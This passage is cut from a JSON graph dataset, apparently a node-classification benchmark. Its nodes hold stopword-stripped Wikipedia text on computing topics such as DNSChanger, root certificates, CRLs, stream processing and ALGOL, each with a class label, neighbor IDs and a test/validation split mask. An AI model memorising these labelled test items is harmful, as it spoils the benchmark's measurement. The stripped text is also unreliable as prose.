pgp/gpg keys fingerprints also added server dnssec dns records users want communicate securely software users effectively get/receive data/key/code/webpage etc verified aka authenticated via two aka dual/double trusted pki ttpas/channels time icann dnssec ca ssl/tls certificate pgp/gpg key/signed-code data file trusted solutions techniques used hkps hkps+dnssec+dane https https+hpkp https+hpkp+dnssec+dane vast number user group create new dlv based dnssec registry users use new dlv along icann-dnssec root-key local dnssec-based dns resolver/server domain-owners also use additional signing domain-names new third ttpa case pgp/gpg key/signed-code data webpage web data three/triple-channel verified isc dlv used third ttpa still used widely active availability another new dlv become fourth ttpa",
    "neighbors": [
      513,
      2050,
      5890,
      517,
      5254,
      1288,
      1928,
      4746,
      3982,
      9744,
      1941,
      9884,
      5433,
      3776,
      202,
      10831,
      8283,
      3805,
      8674,
      1251,
      6509,
      2169,
      378,
      510,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 504,
    "label": 9,
    "text": "Russell_Noftsker:russell noftsker russell noftsker american entrepreneur notably founded symbolics first chairman president russell noftsker born february 1942 went education high school carlsbad new mexico steven levy described noftsker compactly built blond pursed features blue eyes noftsker earned degree engineering new mexico state university hired 1965 marvin minsky replace mit administrator project mac ai group later become ai lab dan edwards recently left post would later hire richard stallman programmer intern lab left lab 1973 duress according levy would later return lab richard greenblatt development early lisp machine led noftsker greenblatt working together team lisp machine developers commercialize technology differences business strategy direction split group greenblatt february 1979 year later noftsker rest group formed symbolics inc. robert adams taking role president chairman greenblatt would eventually start lisp machines inc. noftsker ceo brian sear forced symbolics completely board early 1988 internal battle lowering prices noftsker already forced resign president 2 months april 1984 board late 1986 retained chairman ceo first time chairman second 1995 invitation symbolics customer steve gander princeton capital joined group bought assets symbolics bankruptcy",
    "neighbors": [
      4992,
      7048,
      10104,
      989
    ],
    "mask": "Test"
  },
  {
    "node_id": 505,
    "label": 9,
    "text": "Arthur_Whitney_(computer_scientist):arthur whitney computer scientist arthur whitney born october 24 1957 canadian computer scientist notable developing three programming languages inspired apl a+ k q cofounding u.s. company kx systems whitney studied pure mathematics graduate level university toronto early 1980s worked stanford university worked extensively apl first i. p. sharp associates alongside ken iverson roger hui also wrote initial prototype j terse macro-heavy single page code one afternoon served model j implementor roger hui responsible suggesting rank operators j 1988 whitney began working morgan stanley developing financial applications morgan stanley whitney helped develop a+ facilitate migrating apl applications ibm mainframe computers network sun microsystems workstations a+ smaller set primitive functions designed speed handle large sets time series data 1993 whitney left morgan stanley cofounded kx systems janet lustgarten commercialize k programming language company signed exclusive agreement union bank switzerland whitney developed variety trading applications using k contract expired outset contract whitney developed kdb database built k. 2003 kx systems released q new vector language built upon k kdb+ database developed whitney 2018 first derivatives bought-out whitney lustgarten minority shares kx systems whitney lustgarten founded shakti",
    "neighbors": [
      9993,
      1178,
      8987,
      667,
      10668,
      4921,
      9019,
      9665,
      8262,
      1099,
      7630,
      2519,
      1883,
      11099,
      9825,
      11625,
      4331,
      2670,
      8695,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 506,
    "label": 6,
    "text": "Mtab:mtab mtab contraction mounted file systems table file system information file commonly found unix-like systems file lists currently mounted filesystems along initialization options codice_1 lot common codice_2 distinction latter configuration file listing available filesystems mounted mount points boot time whereas former lists currently mounted ones include manually mounted ones listed fstab therefore mtab usually format similar fstab time possible directly use lines codice_1 codice_2 file commonly resides codice_5 systems symlink /proc/mounts sample codice_1 contents",
    "neighbors": [
      515,
      9733,
      9735,
      3976,
      4750,
      5397,
      2198,
      6812,
      9762,
      7847,
      4398,
      1336,
      7356,
      451,
      965,
      8522,
      3659,
      9946,
      6120,
      491,
      4850,
      5492,
      9204,
      6138,
      5759
    ],
    "mask": "None"
  },
  {
    "node_id": 507,
    "label": 4,
    "text": "DNSChanger:dnschanger dnschanger dns hijacking trojan work estonian company known rove digital malware infected computers modifying computer dns entries point toward rogue name servers injected advertising web pages peak dnschanger estimated infected four million computers bringing least us 14 million profits operator fraudulent advertising revenue windows mac os x variants dnschanger circulated latter taking form related trojan known rsplug fbi raided malicious servers november 8 2011 kept servers captured avoid affected users losing internet access july 9 2012 dnschanger distributed drive-by download claiming video codec needed view content web site particularly appearing rogue pornography sites installed malware modified system domain name system dns configuration pointing rogue name servers operated affiliates rove digital rogue name servers primarily substituted advertising web pages advertising sold rove additionally rogue dns server redirected links certain web sites advertisers example redirecting irs web site tax preparation company effects dnschanger could also spread computers within lan mimicking dhcp server pointing computers toward rogue dns servers indictment rove united states department justice also reported rogue servers blocked access update servers antivirus software october 1 2011 part operation ghost click collaborative investigation operation united states attorney southern district new york announced charges six estonian nationals one russian national connected dnschanger rove digital wire fraud computer intrusion conspiracy arrests made estonian authorities servers connected malware located united states seized fbi due concerns fbi agents users still infected dnschanger could lose internet access rogue dns servers shut entirely temporary court order obtained allow internet systems consortium operate replacement servers would serve dns requests yet removed infection collect information still infected order promptly notify presence malware court order set expire march 8 2012 extension granted july 9 2012 due concerns still many infected computers f-secure estimated july 4 2012 least 300,000 computers still infected dnschanger malware 70,000 located united states interim dns servers officially shut fbi july 9 2012 impact shutdown considered minimal due part major internet service providers providing temporary dns services support customers affected dnschanger informational campaigns surrounding malware impending shutdown included online tools could check presence dnschanger google facebook provided notifications visitors respective services still affected malware july 9 2012 f-secure estimated number remaining dnschanger infections u.s. dropped 70,000 42,000",
    "neighbors": [
      1024,
      5636,
      10756,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      1608,
      3657,
      8779,
      7251,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      5764,
      2187,
      6797,
      4240,
      1688,
      2717,
      9375,
      2213,
      9904,
      9395,
      8886,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      9537,
      2887,
      6484,
      857,
      1882,
      7515,
      3956,
      8054,
      9082,
      7044,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      6076,
      9664,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      3555,
      2542
    ],
    "mask": "None"
  },
  {
    "node_id": 508,
    "label": 3,
    "text": "Stream_processing:stream processing stream processing computer programming paradigm equivalent dataflow programming event stream processing reactive programming allows applications easily exploit limited form parallel processing applications use multiple computational units floating point unit graphics processing unit field-programmable gate arrays fpgas without explicitly managing allocation synchronization communication among units stream processing paradigm simplifies parallel software hardware restricting parallel computation performed given sequence data stream series operations kernel functions applied element stream kernel functions usually pipelined optimal local on-chip memory reuse attempted order minimize loss bandwidth accredited external memory interaction uniform streaming one kernel function applied elements stream typical since kernel stream abstractions expose data dependencies compiler tools fully automate optimize on-chip management tasks stream processing hardware use scoreboarding example initiate direct memory access dma dependencies become known elimination manual dma management reduces software complexity associated elimination hardware cached i/o reduces data area expanse involved service specialized computational units arithmetic logic units 1980s stream processing explored within dataflow programming example language sisal streams iteration single assignment language stream processing essentially compromise driven data-centric model works well traditional dsp gpu-type applications image video digital signal processing less general purpose processing randomized data access databases sacrificing flexibility model implications allow easier faster efficient execution depending context processor design may tuned maximum efficiency trade-off flexibility stream processing especially suitable applications exhibit three application characteristics examples records within streams include record read input perform operations write output permissible multiple inputs multiple outputs never piece memory readable writable basic computers started sequential execution paradigm traditional cpus sisd based means conceptually perform one operation time computing needs world evolved amount data managed increased quickly obvious sequential programming model could cope increased need processing power various efforts spent finding alternative ways perform massive amounts computations solution exploit level parallel execution result efforts simd programming paradigm allowed applying one instruction multiple instances different data time simd used swar environment using complicated structures one could also mimd parallelism although two paradigms efficient real-world implementations plagued limitations memory alignment problems synchronization issues limited parallelism simd processors survived stand-alone components embedded standard cpus consider simple program adding two arrays containing 100 4-component vectors i.e 400 numbers total sequential paradigm familiar variations exist inner loops structures ultimately boil construct actually oversimplified assumes instruction codice_1 works although happens instruction intrinsics much information actually taken account number vector components data format done clarity see however method reduces number decoded instructions numelements componentsperelement numelements number jump instructions also decreased loop run fewer times gains result parallel execution four mathematical operations happened however packed simd register holds certain amount data possible get parallelism speed somewhat limited assumption made performing four parallel operations please note common altivec sse paradigm whole dataset defined rather component block defined separately describing set data assumed first two rows result inferred sources kernel simplicity 1:1 mapping input output data need applied kernels also much complex implementation paradigm unroll loop internally allows throughput scale chip complexity easily utilizing hundreds alus elimination complex data patterns makes much extra power available stream processing branch simd/mimd processing must confused although simd implementations often work streaming manner performance comparable model envisions different usage pattern allows far greater performance noted applied generic processors standard cpu 1.5x speedup reached contrast ad-hoc stream processors easily reach 10x performance mainly attributed efficient memory access higher levels parallel processing although various degrees flexibility allowed model stream processors usually impose limitations kernel stream size example consumer hardware often lacks ability perform high-precision math lacks complex indirection chains presents lower limits number instructions executed stanford university stream processing projects included stanford real-time programmable shading project started 1999 prototype called imagine developed 2002 project called merrimac ran 2004 also researched stream-enhanced processors graphics processing units rapidly evolved speed functionality since early days dozens stream processing languages developed well specialized hardware immediate challenge realm parallel processing lie much type hardware architecture used easy program system question real-world environment acceptable performance machines like imagine use straightforward single-threaded model automated dependencies memory allocation dma scheduling result research mit stanford finding optimal layering tasks programmer tools hardware programmers beat tools mapping algorithms parallel hardware tools beat programmers figuring smartest memory allocation schemes etc particular concern mimd designs cell programmer needs deal application partitioning across multiple cores deal process synchronization load balancing efficient multi-core programming tools severely lacking today drawback simd programming issue array-of-structures aos structure-of-arrays soa programmers often wanted build data structures 'real meaning example happened structures assembled arrays keep things nicely organized array structures aos structure laid memory compiler produce interleaved data sense structures contiguous constant offset say size attribute structure instance element following instance offset depends structure definition possibly things considered compiler policies also problems example three position variables simd-ized way sure allocated continuous memory space make sure simd operations work shall grouped 'packed memory location least array another problem lies color xyz defined three-component vector quantities simd processors usually support 4-component operations exceptions however kinds problems limitations made simd acceleration standard cpus quite nasty proposed solution structure arrays soa follows readers experienced c '* identifier means pointer case used point first element array allocated later java programmers roughly equivalent drawback various attributes could spread memory make sure cause cache misses 'll update various reds greens blues stream processors usage structures encouraged application point view attributes defined flexibility taking gpus reference set attributes least 16 available attribute application state number components format components primitive data types supported various attributes attached memory block possibly defining stride 'consecutive elements attributes effectively allowing interleaved data gpu begins stream processing gather various attributes single set parameters usually looks like structure magic global variable performs operations scatters results memory area later processing retrieving modern stream processing frameworks provide fifo like interface structure data literal stream abstraction provides means specify data dependencies implicitly enabling runtime/hardware take full advantage knowledge efficient computation one simplest efficient stream processing modalities date c++ raftlib enables linking independent compute kernels together data flow graph using c++ stream operators example apart specifying streaming applications high-level language models computation mocs also widely used dataflow models process-based models historically cpus began implementing various tiers memory access optimizations ever-increasing performance compared relatively slow growing external memory bandwidth gap widened big amounts die area dedicated hiding memory latencies since fetching information opcodes alus expensive little die area dedicated actual mathematical machinery rough estimation consider less 10 similar architecture exists stream processors thanks new programming model amount transistors dedicated management actually little beginning whole system point view stream processors usually exist controlled environment gpus exist add-in board seems also apply imagine cpus dirty job managing system resources running applications stream processor usually equipped fast efficient proprietary memory bus crossbar switches common multi-buses employed past exact amount memory lanes dependent market range written still 64-bit wide interconnections around entry-level mid-range models use fast 128-bit crossbar switch matrix 4 2 segments high-end models deploy huge amounts memory actually 512 mb slightly slower crossbar 256 bits wide contrast standard processors intel pentium athlon 64 single 64-bit wide data bus memory access patterns much predictable arrays exist dimension fixed kernel invocation thing closely matches multiple pointer indirection indirection chain however guaranteed finally read write specific memory area inside stream simd nature stream processor execution units alus clusters read/write operations expected happen bulk memories optimized high bandwidth rather low latency difference rambus ddr sdram example also allows efficient memory bus negotiations 90 stream processor work done on-chip requiring 1 global data stored memory knowing kernel temporaries dependencies pays internally stream processor features clever communication management circuits interesting stream register file srf conceptually large cache stream data stored transferred external memory bulks cache-like software-controlled structure various alus srf shared various alu clusters key concept innovation done stanford imagine chip compiler able automate allocate memory optimal way fully transparent programmer dependencies kernel functions data known programming model enables compiler perform flow analysis optimally pack srfs commonly cache dma management take majority project schedule something stream processor least imagine totally automates tests done stanford showed compiler well better job scheduling memory hand tuned thing much effort proof lot clusters inter-cluster communication assumed rare internally however cluster efficiently exploit much lower amount alus intra-cluster communication common thus needs highly efficient keep alus fetched data alu equipped local register files lrfs basically usable registers three-tiered data access pattern makes easy keep temporary data away slow memories thus making silicon implementation highly efficient power-saving although order magnitude speedup reasonably expected even mainstream gpus computing streaming manner applications benefit communication latencies actually biggest problem although pci express improved full-duplex communications getting gpu possibly generic stream processor work possibly take long amounts time means usually counter-productive use small datasets changing kernel rather expensive operation stream architecture also incurs penalties small streams behaviour referred short stream effect pipelining widespread heavily used practice stream processors gpus featuring pipelines exceeding 200 stages cost switching settings dependent setting modified considered always expensive avoid problems various levels pipeline many techniques deployed über shaders texture atlases techniques game-oriented nature gpus concepts interesting generic stream processing well programming languages stream processors start java c c++ add extensions provide specific instructions allow application developers tag kernels and/or streams also applies shading languages considered stream programming languages certain degree non-commercial examples stream programming languages include commercial implementations either general purpose tied specific hardware vendor examples general purpose languages include vendor-specific languages include event-based processing batch file-based processing emulates actual stream processing much lower performance general continuous operator stream processing stream processing services",
    "neighbors": [
      7173,
      9739,
      9741,
      7699,
      1047,
      5655,
      1051,
      10781,
      10270,
      8231,
      6184,
      5677,
      7218,
      2623,
      2113,
      7234,
      3142,
      1614,
      2638,
      2140,
      1122,
      4194,
      3175,
      5223,
      8810,
      4205,
      8815,
      630,
      6774,
      8822,
      7802,
      3197,
      7313,
      6815,
      8352,
      5793,
      2210,
      6818,
      9380,
      6821,
      5798,
      6311,
      7852,
      9391,
      7858,
      4276,
      9911,
      8890,
      4286,
      2241,
      2243,
      5329,
      4308,
      10966,
      2264,
      731,
      11485,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      10483,
      757,
      2805,
      10485,
      2296,
      249,
      3323,
      6909,
      8447,
      1798,
      6926,
      6415,
      785,
      1298,
      2838,
      7963,
      8995,
      6950,
      2345,
      4909,
      3886,
      309,
      8501,
      2361,
      5948,
      7998,
      4928,
      4417,
      8514,
      5956,
      4423,
      7497,
      330,
      1866,
      6476,
      8523,
      7505,
      9044,
      11604,
      344,
      2394,
      8543,
      1376,
      11618,
      1387,
      10603,
      11630,
      4465,
      6004,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      6032,
      5523,
      10658,
      9126,
      10669,
      7598,
      1967,
      2480,
      10675,
      8116,
      1461,
      1463,
      7607,
      8120,
      4030,
      8126,
      3014,
      1480,
      466,
      2008,
      1499,
      9179,
      1502,
      5090,
      995,
      7142,
      2536,
      8680,
      9707,
      10734,
      6639,
      499,
      4596,
      1018,
      8700,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 509,
    "label": 4,
    "text": "Cryptanalytic_computer:cryptanalytic computer cryptanalytic computer computer designed used cryptanalysis nowadays involves massive statistical analysis multiple trial decryptions since world war ii possible automated equipment polish cryptanalysts designed built automated aids work enigma traffic arguably first modern computer digital electronic somewhat programmable built cryptanalytic work bletchley park colossus war modern computers important world war ii machines like cray-1 reported machine instructions hardwired request nsa computers continue important cryptanalysis well 21st century nsa fact said largest number installed computers planet whether true age google computer farms remains publicly unknown",
    "neighbors": [
      1941
    ],
    "mask": "Test"
  },
  {
    "node_id": 510,
    "label": 4,
    "text": "Root_certificate:root certificate cryptography computer security root certificate public key certificate identifies root certificate authority ca root certificates self-signed form basis x.509-based public key infrastructure pki either matched authority key identifier subject key identifier cases authority key identifier issuer string match subject string rfc5280 instance pkis supporting https secure web browsing electronic signature schemes depend set root certificates certificate authority issue multiple certificates form tree structure root certificate top-most certificate tree private key used sign certificates certificates signed root certificate ca field set true inherit trustworthiness root certificate—a signature root certificate somewhat analogous notarizing identity physical world certificate called intermediate certificate subordinate ca certificate certificates tree also depend trustworthiness intermediates root certificate usually made trustworthy mechanism certificate secure physical distribution example well-known root certificates distributed operating systems manufacturers microsoft distributes root certificates belonging members microsoft root certificate program windows desktops windows phone 8 apple distributes root certificates belonging members root program",
    "neighbors": [
      513,
      517,
      1157,
      1288,
      9744,
      1683,
      10388,
      1046,
      1688,
      3742,
      2083,
      2470,
      8358,
      11048,
      9771,
      3629,
      11693,
      11569,
      9394,
      7736,
      9281,
      9412,
      713,
      3657,
      5834,
      10831,
      11345,
      5590,
      1496,
      474,
      3805,
      7264,
      225,
      8674,
      503,
      7139,
      10341,
      5107,
      501,
      1526,
      119,
      1400,
      2169,
      3707,
      4605,
      2558,
      4863
    ],
    "mask": "Validation"
  },
  {
    "node_id": 511,
    "label": 9,
    "text": "Alan_Kay:alan kay alan curtis kay born may 17 1940 american computer scientist elected fellow american academy arts sciences national academy engineering royal society arts best known pioneering work object-oriented programming windowing graphical user interface design president viewpoints research institute adjunct professor computer science university california los angeles also advisory board tti/vanguard mid-2005 senior fellow hp labs visiting professor kyoto university adjunct professor massachusetts institute technology mit kay also former professional jazz guitarist composer theatrical designer amateur classical pipe organist interview education america davis group ltd. kay said originally springfield massachusetts kay family relocated several times due father career physiology ultimately settling new york metropolitan area nine attended prestigious brooklyn technical high school suspended due insubordination senior year already accumulated enough credits graduate kay attended bethany college bethany west virginia majored biology minored mathematics asked leave administration protesting institution jewish quota thereafter kay taught guitar denver colorado year hastily enlisted united states air force local draft board inquired nonstudent status assigned computer programmer rare billet dominated women due secretarial connotations field era passing aptitude test devised early cross-platform file transfer system following discharge kay enrolled university colorado boulder earning bachelor degree mathematics molecular biology 1966 time worked professional jazz guitarist studies cu wrote music adaptation hobbit campus theatricals autumn 1966 began graduate school university utah college engineering earned m.s electrical engineering 1968 taking ph.d. computer science 1969 doctoral dissertation flex flexible extendable language described invention computer language known flex worked fathers computer graphics david c. evans recently recruited university california berkeley start utah computer science department ivan sutherland best known writing pioneering programs sketchpad mentorship greatly inspired kay evolving views objects programming grew busier darpa research ended musical career 1968 met seymour papert learned logo programming language dialect lisp optimized educational purposes led learn work jean piaget jerome bruner lev vygotsky constructionist learning influencing professional orientation leaving utah associate professor computer science 1969 kay became visiting researcher stanford artificial intelligence laboratory anticipation accepting professorship carnegie mellon university instead 1970 joined xerox parc research staff palo alto california throughout decade developed prototypes networked workstations using programming language smalltalk inventions later commercialized apple lisa macintosh computers kay one fathers idea object-oriented programming named along colleagues parc original object-oriented concepts including use words 'object 'class developed simula 67 norwegian computing center later said 'm sorry long ago coined term objects topic gets many people focus lesser idea big idea messaging parc kay conceived dynabook concept key progenitor laptop tablet computers e-book also architect modern overlapping windowing graphical user interface gui dynabook conceived educational platform kay considered one first researchers mobile learning many features dynabook concept adopted design one laptop per child educational platform kay actively involved field computing awaiting new revolution happen according kay educational communities parents children see set tools invented douglas engelbart medium marshall mcluhan sense wrote simulas leading oop encounter finally hit destiny personal computing really going personal dynamic vehicle engelbart metaphor opposed ibm railroads something much profound personal dynamic medium vehicle one could wait high school give drivers ed medium extend world childhood 1981 1984 kay atari chief scientist became apple fellow 1984 following closure company advanced technology group 1997 recruited friend bran ferren head research development disney join walt disney imagineering disney fellow remained ferren left start applied minds inc imagineer danny hillis leading cessation fellows program 2001 founded viewpoints research institute non-profit organization dedicated children learning advanced software development first ten years kay viewpoints group based applied minds glendale california ferren continued work together various projects kay also senior fellow hewlett-packard hp disbanded advanced software research team july 20 2005 kay taught fall 2011 class powerful ideas useful tools understand world new york university interactive telecommunications program itp along full-time itp faculty member nancy hechinger goal class devise new forms teaching/learning based fundamental powerful concepts rather traditional rote learning december 1995 still apple kay collaborated many others start open source squeak version smalltalk continues work part effort november 1996 team began research became etoys system recently started along david a. smith david p. reed andreas raab rick mcgeer julian lombardi mark mccahill croquet project open source networked 2d 3d environment collaborative work 2001 became clear etoy architecture squeak reached limits morphic interface infrastructure could andreas raab researcher working kay group hewlett-packard proposed defining script process providing default scheduling mechanism avoids several general problems result new user interface proposed replace squeak morphic user interface future tweak added mechanisms islands asynchronous messaging players costumes language extensions projects tile scripting underlying object system class-based users programming acts like prototype-based tweak objects created run tweak project windows november 2005 world summit information society mit research laboratories unveiled new laptop computer educational use around world many names 100 laptop one laptop per child program children machine xo-1 program begun sustained kay friend nicholas negroponte based kay dynabook ideal kay prominent co-developer computer focusing educational software using squeak etoys kay lectured extensively idea computer revolution new good ideas universally implemented lectures oopsla 1997 conference acm turing award talk entitled computer revolution n't happened yet informed experiences sketchpad simula smalltalk bloated code commercial software august 31 2006 kay proposal united states national science foundation nsf granted thus funding viewpoints research institute several years proposal title steps toward reinvention programming compact practical model personal computing self-exploratorium sense kay trying comes quote abstract seminar given intel research labs berkeley conglomeration commercial open source software consumes neighborhood several hundreds millions lines code days wonder small could understandable practical model design covers functionality 1m lines code 200k loc 100k loc 20k loc alan kay received many awards honors among honors include j-d warnier prix d'informatique acm systems software award nec computers communication foundation prize funai foundation prize lewis branscomb technology award acm sigcse award outstanding contributions computer science education",
    "neighbors": [
      9345,
      4483,
      2438,
      9351,
      5384,
      7048,
      4107,
      9975,
      11020,
      9999,
      4114,
      6554,
      4251,
      6557,
      5409,
      9123,
      5029,
      1702,
      10617,
      10668,
      2482,
      9778,
      6454,
      1976,
      58,
      2556,
      4412,
      4799,
      4800,
      10049,
      4930,
      6594,
      11457,
      70,
      8262,
      10568,
      3529,
      11339,
      10061,
      5585,
      1112,
      6234,
      1883,
      862,
      4830,
      7775,
      11361,
      9315,
      6502,
      10471,
      11625,
      2282,
      2283,
      9323,
      1389,
      2798,
      8430,
      9710,
      11118,
      11242,
      1783,
      8057,
      3323,
      3196
    ],
    "mask": "Validation"
  },
  {
    "node_id": 512,
    "label": 9,
    "text": "ALGOL:algol algol short algorithmic language family imperative computer programming languages originally developed mid-1950s greatly influenced many languages standard method algorithm description used acm textbooks academic sources thirty years sense syntax modern languages algol-like arguably influential four high-level programming languages among roughly contemporary fortran lisp cobol designed avoid perceived problems fortran eventually gave rise many programming languages including pl/i simula bcpl b pascal c. algol introduced code blocks codice_1 ... codice_2 pairs delimiting also first language implementing nested function definitions lexical scope moreover first programming language gave detailed attention formal language definition algol 60 report introduced backus–naur form principal formal grammar notation language design three major specifications named year first published algol 68 substantially different algol 60 well received general algol means algol 60 dialects thereof international algebraic language ial algol 58 extremely influential generally considered ancestor modern programming languages so-called algol-like languages additionally algol object code simple compact stack-based instruction set architecture commonly used teaching compiler construction high order languages algol generally considered first algol developed jointly committee european american computer scientists meeting 1958 eth zurich cf algol 58 specified three different syntaxes reference syntax publication syntax implementation syntax different syntaxes permitted use different keyword names conventions decimal points commas vs periods different languages algol used mostly research computer scientists united states europe use commercial applications hindered absence standard input/output facilities description lack interest language large computer vendors burroughs corporation algol 60 however become standard publication algorithms profound effect future language development john backus developed backus normal form method describing programming languages specifically algol 58 revised expanded peter naur algol 60 donald knuth suggestion renamed backus–naur form peter naur editor algol bulletin drawn international discussions language selected member european language design group november 1959 capacity editor algol 60 report produced result algol 60 meeting paris january 1960 following people attended meeting paris 1 16 january alan perlis gave vivid description meeting meetings exhausting interminable exhilarating one became aggravated one good ideas discarded along bad ones others nevertheless diligence persisted entire period chemistry 13 excellent algol 60 inspired many languages followed tony hoare remarked language far ahead time improvement predecessors also nearly successors scheme programming language variant lisp adopted block structure lexical scope algol also adopted wording revised report algorithmic language scheme standards documents homage algol peter landin noted language algol first language combine seamlessly imperative effects call-by-name lambda calculus perhaps elegant formulation language due john c. reynolds best exhibits syntactic semantic purity reynolds idealized algol also made convincing methodological argument regarding suitability local effects context call-by-name languages contrasted global effects used call-by-value languages ml conceptual integrity language made one main objects semantic research along pcf ml date least 70 augmentations extensions derivations sublanguages algol 60 burroughs dialects included special bootstrapping dialects espol newp latter still used unisys mcp system software algol 60 officially defined i/o facilities implementations defined ways rarely compatible contrast algol 68 offered extensive library transput input/output facilities algol 60 allowed two evaluation strategies parameter passing common call-by-value call-by-name call-by-name certain effects contrast call-by-reference example without specifying parameters value reference impossible develop procedure swap values two parameters actual parameters passed integer variable array indexed integer variable think passing pointer swap function every time swap referenced reevaluated say 1 2 every time swap referenced 'll return combination values 1,2 2,1 1,2 similar situation occurs random function passed actual argument call-by-name known many compiler designers interesting thunks used implement donald knuth devised man boy test separate compilers correctly implemented recursion non-local references test contains example call-by-name algol 68 defined using two-level grammar formalism invented adriaan van wijngaarden bears name van wijngaarden grammars use context-free grammar generate infinite set productions recognize particular algol 68 program notably able express kind requirements many programming language standards labelled semantics expressed ambiguity-prone natural language prose implemented compilers ad hoc code attached formal language parser procedure absmax size n result subscripts k example produce table using elliott 803 algol punch 3 sends output teleprinter rather tape punch. br sameline suppresses carriage return line feed normally printed arguments. br aligned 1,6 controls format output 1 digit 6 decimal point following code samples algol 68 versions algol 60 code samples algol 68 implementations used algol 60 approaches stropping algol 68 case tokens bold typeface reserved words types modes operators note lower ⌊ upper ⌈ bounds array array slicing directly available programmer variations lack portability programs one implementation another easily demonstrated classic hello world program algol 58 i/o facilities since algol 60 i/o facilities portable hello world program algol simpler program using inline format even simpler program using display statement alternative example using elliott algol i/o follows elliott algol used different characters open-string-quote close-string-quote version elliott 803 algol a104 standard elliott 803 used 5 hole paper tape thus upper case code lacked quote characters £ uk pound sign used open quote question mark close quote special sequences placed double quotes e.g ££l produced new line teleprinter ict 1900 series algol i/o version allowed input paper tape punched card paper tape 'full mode allowed lower case output line printer open close quote characters represented using spaces algol 68 code published reserved words typically lowercase bolded underlined language algol 68 report input/output facilities collectively called transput algols conceived time character sets diverse evolving rapidly also algols defined uppercase letters required 1960 ifip – algol 60 language report included several mathematical symbols available modern computers operating systems unfortunately supported computing systems time instance × ÷ ≤ ≥ ≠ ¬ ∨ ∧ ⊂ ≡ ␣ ⏨ 1961 september ascii – ascii character set early stage development back slash character added order support algol boolean operators /\\ \\/ 1962 alcor – character set included unusual ᛭ runic cross character multiplication ⏨ decimal exponent symbol floating point notation 1964 gost – 1964 soviet standard gost 10859 allowed encoding 4-bit 5-bit 6-bit 7-bit characters algol 1968 algol 68 report – used existing algol characters adopted → ↓ ↑ □ ⌊ ⌈ ⎩ ⎧ ○ ⊥ ¢ characters found ibm 2741 keyboard golf-ball print heads inserted apl golfball became available mid-1960s algol 68 drafted report translated russian german french bulgarian allowed programming languages larger character sets e.g cyrillic alphabet soviet besm-4 algol characters also part unicode standard available several popular fonts 2009 october unicode – ⏨ decimal exponent symbol floating point notation added unicode 5.2 backward compatibility historic buran spacecraft algol software",
    "neighbors": [
      4608,
      5635,
      10246,
      3594,
      6160,
      1045,
      2585,
      8732,
      3613,
      5663,
      11295,
      2617,
      3642,
      6718,
      3650,
      1606,
      8262,
      8775,
      1610,
      1611,
      9804,
      2638,
      9294,
      5714,
      9299,
      6742,
      2650,
      7775,
      6242,
      9315,
      8813,
      9330,
      9331,
      6772,
      1145,
      9345,
      3716,
      1672,
      10387,
      11411,
      3737,
      1180,
      10400,
      1702,
      8879,
      1203,
      6840,
      4799,
      8385,
      10435,
      8902,
      727,
      7386,
      10458,
      5342,
      5354,
      2283,
      2798,
      9454,
      4341,
      11010,
      1804,
      2316,
      4877,
      6414,
      8973,
      10508,
      10510,
      4900,
      9002,
      7983,
      2352,
      305,
      9008,
      10031,
      11059,
      1333,
      8502,
      7479,
      4410,
      5946,
      10043,
      8510,
      1343,
      10047,
      10560,
      1349,
      10568,
      10569,
      8524,
      5455,
      6994,
      10581,
      3418,
      1883,
      11099,
      10083,
      6502,
      10089,
      1392,
      11637,
      5496,
      8057,
      5503,
      9599,
      386,
      898,
      8069,
      4492,
      10641,
      8082,
      6036,
      406,
      1947,
      1952,
      1953,
      10145,
      421,
      6056,
      5033,
      428,
      2482,
      1976,
      10680,
      955,
      1469,
      963,
      5059,
      3529,
      1999,
      11219,
      6102,
      477,
      2533,
      5097,
      11242,
      3051,
      11253,
      7158,
      6652,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 513,
    "label": 4,
    "text": "Certificate_revocation_list:certificate revocation list cryptography certificate revocation list crl list digital certificates revoked issuing certificate authority ca scheduled expiration date longer trusted two different states revocation defined rfc 5280 reasons revoke certificate according nowiki rfc 5280 /nowiki p69 note value 7 used crl generated published periodically often defined interval crl also published immediately certificate revoked crl issued crl issuer typically ca also issued corresponding certificates could alternatively trusted authority crls lifetime valid timeframe often 24 hours less crl validity period may consulted pki-enabled application verify certificate prior use prevent spoofing denial-of-service attacks crls usually carry digital signature associated ca published validate specific crl prior relying certificate corresponding ca needed certificates crl maintained often x.509/public key certificates format commonly used pki schemes expiration dates substitute crl expired certificates considered invalid unexpired certificates valid crls certificate validation techniques necessary part properly operated pki mistakes certificate vetting key management expected occur real world operations noteworthy example certificate microsoft mistakenly issued unknown individual successfully posed microsoft ca contracted maintain activex 'publisher certificate system verisign microsoft saw need patch cryptography subsystem would check status certificates trusting short-term fix patch issued relevant microsoft software importantly windows specifically listing two certificates question revoked best practices require wherever however certificate status maintained must checked whenever one wants rely certificate failing revoked certificate may incorrectly accepted valid means use pki effectively one must access current crls requirement on-line validation negates one original major advantages pki symmetric cryptography protocols namely certificate self-authenticating symmetric systems kerberos also depend existence on-line services key distribution center case kerberos existence crl implies need someone organization enforce policy revoke certificates deemed counter operational policy certificate mistakenly revoked significant problems arise certificate authority tasked enforcing operational policy issuing certificates typically responsible determining revocation appropriate interpreting operational policy necessity consulting crl certificate status service prior accepting certificate raises potential denial-of-service attack pki acceptance certificate fails absence available valid crl operations depending upon certificate acceptance take place issue exists kerberos systems well failure retrieve current authentication token prevent system access alternative using crls certificate validation protocol known online certificate status protocol ocsp ocsp primary benefit requiring less network bandwidth enabling real-time near real-time status checks high volume high-value operations firefox 28 mozilla announced deprecating crl favour ocsp crl files may grow quite large time e.g us government certain institution multiple megabytes therefore incremental crls designed sometimes referred delta crls however clients implement authority revocation list arl form crl containing certificates issued certificate authorities contrary crls contain revoked end-entity certificates",
    "neighbors": [
      6657,
      517,
      9744,
      2579,
      2083,
      9770,
